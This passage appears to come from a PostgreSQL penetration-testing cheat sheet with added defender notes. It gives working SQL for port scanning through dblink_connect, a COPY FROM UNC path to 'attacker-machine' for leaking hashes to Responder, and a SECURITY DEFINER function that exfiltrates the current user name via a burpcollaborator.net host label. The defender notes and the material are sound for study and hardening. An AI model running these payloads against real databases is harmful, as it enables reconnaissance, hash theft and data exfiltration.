Note that this configuration is commonly used to modify the password of a db user when the admin forgets it, so you may sometimes find it in place. Note also that the file pg_hba.conf is readable only by the postgres user and group and writable only by the postgres user.
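-- dblink_connect makes the database server itself open the TCP connection
-- described by the connection string. The error text returned to the caller
-- differs by the state of the remote port, so the server's replies reveal what
-- is reachable from the database host's network position.
--
-- Defender notes:
--   * Install the dblink extension only where it is needed, and revoke
--     EXECUTE on its functions from PUBLIC.
--   * Restrict outbound traffic from the database host to the peers it
--     actually needs.
--   * Log and alert on dblink calls whose target is not an expected peer,
--     and on repeated "could not establish connection" errors.
SELECT *
FROM dblink_connect('host=216.58.212.238 port=443 user=name password=secret dbname=abc connect_timeout=10');

-- Different response
-- (sample outputs; the host and port in the first message appear to come from
--  a different probe than the query above)

-- Port closed
--   ERROR: could not establish connection
--   DETAIL: could not connect to server: Connection refused
--   Is the server running on host "127.0.0.1" and accepting
--   TCP/IP connections on port 4444?

-- Port Filtered/Timeout
--   ERROR: could not establish connection
--   DETAIL: timeout expired

-- Accessing HTTP server
--   ERROR: could not establish connection
--   DETAIL: timeout expired

-- Accessing HTTPS server
--   ERROR: could not establish connection
--   DETAIL: received invalid response to SSL negotiation: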
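-- can be used to leak hashes to Responder/equivalent
--
-- COPY ... FROM with a UNC path makes a Windows-hosted server open an SMB
-- connection to the named host, authenticating as the account that runs the
-- PostgreSQL service.
--
-- Defender notes:
--   * COPY to or from a server-side file is limited to superusers and members
--     of pg_read_server_files / pg_write_server_files; keep that membership
--     minimal and avoid application logins with superuser rights.
--   * Block outbound SMB (TCP 445) from database hosts.
--   * Run the service under a low-privilege account with a strong password.
--   * Alert on COPY statements whose source is a UNC path.
CREATE TABLE test();
COPY test FROM E'\\\\attacker-machine\\footestbar.txt';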
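-- to extract the value of user and send it to Burp Collaborator
--
-- The function builds a COPY statement as a string, placing the result of
-- SELECT user into the host part of a UNC path, and runs it with EXECUTE.
-- Resolving that host name carries the value off the database host.
--
-- Defender notes:
--   * Monitor DNS queries from database hosts. Lookups for names outside the
--     expected set, especially with data-like leading labels, are a
--     detection signal.
--   * Block outbound SMB, and restrict outbound DNS to internal resolvers
--     that are logged.
--   * COPY from a server-side path needs superuser or pg_read_server_files;
--     keep those grants minimal.
--   * Audit functions that combine SECURITY DEFINER with dynamic EXECUTE, and
--     limit who holds CREATE on schemas.
CREATE TABLE test(retval text);

CREATE OR REPLACE FUNCTION testfunc() RETURNS VOID AS $$
DECLARE sqlstring TEXT;
DECLARE userval TEXT;
BEGIN
    -- Read the current user name into a local variable.
    SELECT INTO userval (SELECT user);
    -- Build the COPY statement, using the user name as the leading host label.
    sqlstring := E'COPY test(retval) FROM E\'\\\\\\\\'||userval||E'.xxxx.burpcollaborator.net\\\\test.txt\'';
    EXECUTE sqlstring;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;

SELECT testfunc();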